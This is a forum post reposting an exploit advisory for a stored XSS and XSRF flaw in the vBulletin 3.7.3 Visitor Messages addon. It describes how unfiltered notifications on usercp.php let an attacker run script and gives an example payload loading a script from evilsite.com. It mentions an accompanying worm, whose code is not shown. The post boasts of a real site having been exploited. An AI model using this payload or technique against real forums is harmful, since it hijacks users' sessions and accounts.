| vBulletin 3.7.3 Visitor Messages XSS/XSRF
[COLOR=#cccccc]My friend Mike contacted me on MSN and told me how he exploited a site with all these flaws. To my amazement, I realised it was on milwOrm out of all places.
/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF
- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.
* Enjoy. Credits to Michael J who exploited it | 
Linear Mode
